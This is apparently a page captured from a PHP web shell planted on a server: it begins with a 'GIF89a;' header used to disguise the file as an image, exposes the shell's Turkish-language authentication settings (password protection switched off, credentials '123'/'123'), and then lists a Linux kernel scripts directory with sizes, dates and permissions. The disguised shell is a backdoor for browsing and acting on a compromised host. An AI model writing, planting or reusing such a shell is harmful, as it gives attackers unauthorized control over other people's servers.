GIF89a; # Konfigurasyon $sayfaSifreleme ='0'; # 1 acik , 0 kapali $kullaniciAdi = '123'; $sifre = '123'; # yetki kontrol fonksiyonu function yetkiKontrol($kullaniciAdi,$sifre) { if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") { header('WWW-Authenticate: Basic realm="x"'); die(header('HTTP/1.0 401 Unauthorized')); } } # Sayfa Sifreleme aciksa if($sayfaSifreleme =='1') { # Veri ve sifre kontrolu yetkiKontrol($kullaniciAdi,$sifre); } ?>
| Name | Size | Modified | Perms | Actions | |
|---|---|---|---|---|---|
| atomic | --- | October 03 2025 06:39:56. | 0755 | ||
| basic | --- | October 03 2025 06:39:56. | 0755 | ||
| clang-tools | --- | October 03 2025 06:39:56. | 0755 | ||
| coccinelle | --- | October 03 2025 06:39:53. | 0755 | ||
| dtc | --- | October 03 2025 06:39:56. | 0755 | ||
| dummy-tools | --- | October 03 2025 06:39:56. | 0755 | ||
| gcc-plugins | --- | October 03 2025 06:39:56. | 0755 | ||
| gdb | --- | October 03 2025 06:39:56. | 0755 | ||
| genksyms | --- | October 03 2025 06:39:56. | 0755 | ||
| kconfig | --- | October 03 2025 06:39:56. | 0755 | ||
| ksymoops | --- | October 03 2025 06:39:56. | 0755 | ||
| mod | --- | October 03 2025 06:39:56. | 0755 | ||
| package | --- | October 03 2025 06:39:56. | 0755 | ||
| selinux | --- | October 03 2025 06:39:56. | 0755 | ||
| tracing | --- | October 03 2025 06:39:56. | 0755 | ||
| .gitignore | 160 bytes | October 31 2021 20:53:10. | 0644 | ||
| Kbuild.include | 10.15 KB | August 22 2025 07:58:05. | 0644 | ||
| Kconfig.include | 2.57 KB | August 22 2025 07:58:05. | 0644 | ||
| Lindent | 502 bytes | October 31 2021 20:53:10. | 0755 | ||
| Makefile | 1.64 KB | August 22 2025 07:58:05. | 0644 | ||
| Makefile.asm-generic | 1.82 KB | October 31 2021 20:53:10. | 0644 | ||
| Makefile.build | 19.66 KB | August 22 2025 07:58:05. | 0644 | ||
| Makefile.clang | 1.56 KB | August 22 2025 07:58:05. | 0644 | ||
| Makefile.clean | 2.20 KB | October 31 2021 20:53:10. | 0644 | ||
| Makefile.compiler | 2.61 KB | August 22 2025 07:58:05. | 0644 | ||
| Makefile.dtbinst | 1007 bytes | August 22 2025 07:58:05. | 0644 | ||
| Makefile.extrawarn | 3.02 KB | August 22 2025 07:58:05. | 0644 | ||
| Makefile.gcc-plugins | 2.71 KB | August 22 2025 07:58:05. | 0644 | ||
| Makefile.headersinst | 2.88 KB | October 31 2021 20:53:10. | 0644 | ||
| Makefile.host | 4.63 KB | October 31 2021 20:53:10. | 0644 | ||
| Makefile.kasan | 1.67 KB | October 31 2021 20:53:10. | 0644 | ||
| Makefile.kcov | 333 bytes | October 31 2021 20:53:10. | 0644 | ||
| Makefile.kcsan | 739 bytes | October 31 2021 20:53:10. | 0644 | ||
| Makefile.lib | 18.02 KB | August 22 2025 07:58:05. | 0644 | ||
| Makefile.modfinal | 2.73 KB | August 22 2025 07:58:05. | 0644 | ||
| Makefile.modinst | 2.51 KB | August 22 2025 07:58:05. | 0644 | ||
| Makefile.modpost | 4.37 KB | August 22 2025 07:58:05. | 0644 | ||
| Makefile.package | 6.61 KB | October 31 2021 20:53:10. | 0644 | ||
| Makefile.ubsan | 770 bytes | August 22 2025 07:58:05. | 0644 | ||
| Makefile.userprogs | 1.57 KB | October 31 2021 20:53:10. | 0644 | ||
| adjust_autoksyms.sh | 2.07 KB | October 31 2021 20:53:10. | 0755 | ||
| as-version.sh | 2.03 KB | August 22 2025 07:58:05. | 0755 | ||
| asn1_compiler.c | 35.33 KB | August 22 2025 07:58:05. | 0644 | ||
| bin2c.c | 743 bytes | October 31 2021 20:53:10. | 0644 | ||
| bloat-o-meter | 3.36 KB | October 31 2021 20:53:10. | 0755 | ||
| bootgraph.pl | 5.64 KB | October 31 2021 20:53:10. | 0755 | ||
| bpf_doc.py | 24.98 KB | August 22 2025 07:58:05. | 0755 | ||
| cc-can-link.sh | 166 bytes | October 31 2021 20:53:10. | 0755 | ||
| cc-version.sh | 1.51 KB | October 31 2021 20:53:10. | 0755 | ||
| check-sysctl-docs | 4.37 KB | October 31 2021 20:53:10. | 0755 | ||
| check_extable.sh | 4.93 KB | October 31 2021 20:53:10. | 0755 | ||
| checkdeclares.pl | 1.10 KB | October 31 2021 20:53:10. | 0755 | ||
| checkincludes.pl | 1.94 KB | October 31 2021 20:53:10. | 0755 | ||
| checkkconfigsymbols.py | 15.75 KB | August 22 2025 07:58:05. | 0755 | ||
| checkpatch.pl | 223.75 KB | August 22 2025 07:58:05. | 0755 | ||
| checkstack.pl | 5.86 KB | August 22 2025 07:58:05. | 0755 | ||
| checksyscalls.sh | 7.42 KB | October 31 2021 20:53:10. | 0755 | ||
| checkversion.pl | 2.16 KB | October 31 2021 20:53:10. | 0755 | ||
| cleanfile | 3.46 KB | October 31 2021 20:53:10. | 0755 | ||
| cleanpatch | 5.06 KB | October 31 2021 20:53:10. | 0755 | ||
| coccicheck | 7.89 KB | October 31 2021 20:53:10. | 0755 | ||
| config | 4.78 KB | August 22 2025 07:58:05. | 0755 | ||
| const_structs.checkpatch | 1009 bytes | October 31 2021 20:53:10. | 0644 | ||
| decode_stacktrace.sh | 7.51 KB | August 22 2025 07:58:05. | 0755 | ||
| decodecode | 2.88 KB | October 31 2021 20:53:10. | 0755 | ||
| depmod.sh | 1.41 KB | October 31 2021 20:53:10. | 0755 | ||
| dev-needs.sh | 6.07 KB | October 31 2021 20:53:10. | 0755 | ||
| diffconfig | 4.12 KB | August 22 2025 07:58:05. | 0755 | ||
| documentation-file-ref-check | 5.55 KB | October 31 2021 20:53:10. | 0755 | ||
| export_report.pl | 4.50 KB | October 31 2021 20:53:10. | 0755 | ||
| extract-cert.c | 3.63 KB | August 22 2025 07:58:05. | 0644 | ||
| extract-ikconfig | 1.69 KB | October 31 2021 20:53:10. | 0755 | ||
| extract-module-sig.pl | 3.66 KB | October 31 2021 20:53:10. | 0755 | ||
| extract-sys-certs.pl | 3.75 KB | October 31 2021 20:53:10. | 0755 | ||
| extract-vmlinux | 1.66 KB | October 31 2021 20:53:10. | 0755 | ||
| extract_xc3028.pl | 44.62 KB | October 31 2021 20:53:10. | 0755 | ||
| faddr2line | 8.17 KB | August 22 2025 07:58:05. | 0755 | ||
| file-size.sh | 86 bytes | October 31 2021 20:53:10. | 0755 | ||
| find-unused-docs.sh | 1.27 KB | October 31 2021 20:53:10. | 0755 | ||
| gcc-goto.sh | 511 bytes | October 31 2021 20:53:10. | 0755 | ||
| gcc-ld | 711 bytes | October 31 2021 20:53:10. | 0755 | ||
| gcc-x86_32-has-stack-protector.sh | 405 bytes | August 22 2025 07:58:05. | 0755 | ||
| gcc-x86_64-has-stack-protector.sh | 195 bytes | August 22 2025 07:58:05. | 0755 | ||
| gen_autoksyms.sh | 1.47 KB | October 31 2021 20:53:10. | 0755 | ||
| gen_ksymdeps.sh | 556 bytes | October 31 2021 20:53:10. | 0755 | ||
| generate_initcall_order.pl | 5.95 KB | October 31 2021 20:53:10. | 0755 | ||
| get_abi.pl | 15.10 KB | August 22 2025 07:58:05. | 0755 | ||
| get_dvb_firmware | 24.54 KB | October 31 2021 20:53:10. | 0755 | ||
| get_feat.pl | 14.34 KB | October 31 2021 20:53:10. | 0755 | ||
| get_maintainer.pl | 67.13 KB | October 31 2021 20:53:10. | 0755 | ||
| gfp-translate | 1.69 KB | October 31 2021 20:53:10. | 0755 | ||
| headerdep.pl | 3.50 KB | October 31 2021 20:53:10. | 0755 | ||
| headers_check.pl | 3.73 KB | October 31 2021 20:53:10. | 0755 | ||
| headers_install.sh | 3.35 KB | October 31 2021 20:53:10. | 0755 | ||
| insert-sys-cert.c | 13.08 KB | August 22 2025 07:58:05. | 0644 | ||
| jobserver-exec | 2.16 KB | October 31 2021 20:53:10. | 0755 | ||
| kallsyms.c | 18.06 KB | October 31 2021 20:53:10. | 0644 | ||
| kernel-doc | 68.74 KB | August 22 2025 07:58:05. | 0755 | ||
| ld-version.sh | 1.82 KB | August 22 2025 07:58:05. | 0755 | ||
| leaking_addresses.pl | 12.80 KB | August 22 2025 07:58:05. | 0755 | ||
| link-vmlinux.sh | 10.92 KB | August 22 2025 07:58:05. | 0755 | ||
| makelst | 808 bytes | October 31 2021 20:53:10. | 0755 | ||
| markup_oops.pl | 7.92 KB | October 31 2021 20:53:10. | 0755 | ||
| min-tool-version.sh | 558 bytes | October 31 2021 20:53:10. | 0755 | ||
| mkcompile_h | 2.48 KB | October 31 2021 20:53:10. | 0755 | ||
| mksysmap | 1.34 KB | August 22 2025 07:58:05. | 0755 | ||
| mkuboot.sh | 414 bytes | October 31 2021 20:53:10. | 0755 | ||
| module.lds.S | 1.65 KB | August 22 2025 07:58:05. | 0644 | ||
| modules-check.sh | 427 bytes | October 31 2021 20:53:10. | 0755 | ||
| nsdeps | 1.72 KB | October 31 2021 20:53:10. | 0644 | ||
| objdiff | 2.84 KB | October 31 2021 20:53:10. | 0755 | ||
| pahole-flags.sh | 749 bytes | August 22 2025 07:58:05. | 0755 | ||
| pahole-version.sh | 269 bytes | August 22 2025 07:58:05. | 0755 | ||
| parse-maintainers.pl | 4.54 KB | October 31 2021 20:53:10. | 0755 | ||
| patch-kernel | 9.95 KB | October 31 2021 20:53:10. | 0755 | ||
| profile2linkerlist.pl | 414 bytes | October 31 2021 20:53:10. | 0755 | ||
| prune-kernel | 708 bytes | October 31 2021 20:53:10. | 0755 | ||
| recordmcount.c | 16.75 KB | August 22 2025 07:58:05. | 0644 | ||
| recordmcount.h | 19.37 KB | October 31 2021 20:53:10. | 0644 | ||
| recordmcount.pl | 17.63 KB | August 22 2025 07:58:05. | 0755 | ||
| remove-stale-files | 1.30 KB | October 31 2021 20:53:10. | 0755 | ||
| setlocalversion | 3.50 KB | October 31 2021 20:53:10. | 0755 | ||
| show_delta | 3.01 KB | October 31 2021 20:53:10. | 0755 | ||
| sign-file.c | 9.93 KB | August 22 2025 07:58:05. | 0644 | ||
| sorttable.c | 8.74 KB | August 22 2025 07:58:05. | 0644 | ||
| sorttable.h | 9.83 KB | August 22 2025 07:58:05. | 0644 | ||
| spdxcheck-test.sh | 277 bytes | October 31 2021 20:53:10. | 0644 | ||
| spdxcheck.py | 10.09 KB | October 31 2021 20:53:10. | 0755 | ||
| spelling.txt | 31.88 KB | October 31 2021 20:53:10. | 0644 | ||
| sphinx-pre-install | 24.45 KB | August 22 2025 07:58:05. | 0755 | ||
| split-man.pl | 604 bytes | October 31 2021 20:53:10. | 0755 | ||
| stackdelta | 1.84 KB | October 31 2021 20:53:10. | 0755 | ||
| stackusage | 794 bytes | October 31 2021 20:53:10. | 0755 | ||
| subarch.include | 619 bytes | October 31 2021 20:53:10. | 0644 | ||
| syscallhdr.sh | 1.89 KB | October 31 2021 20:53:10. | 0755 | ||
| syscallnr.sh | 1.45 KB | October 31 2021 20:53:10. | 0755 | ||
| syscalltbl.sh | 1.45 KB | October 31 2021 20:53:10. | 0755 | ||
| tags.sh | 9.87 KB | August 22 2025 07:58:05. | 0755 | ||
| tools-support-relr.sh | 546 bytes | October 31 2021 20:53:10. | 0755 | ||
| ubuntu-retpoline-extract-one | 7.26 KB | August 22 2025 07:58:05. | 0644 | ||
| unifdef.c | 34.80 KB | October 31 2021 20:53:10. | 0644 | ||
| ver_linux | 2.59 KB | October 31 2021 20:53:10. | 0755 | ||
| xen-hypercalls.sh | 386 bytes | October 31 2021 20:53:10. | 0755 | ||
| xz_wrap.sh | 563 bytes | October 31 2021 20:53:10. | 0755 |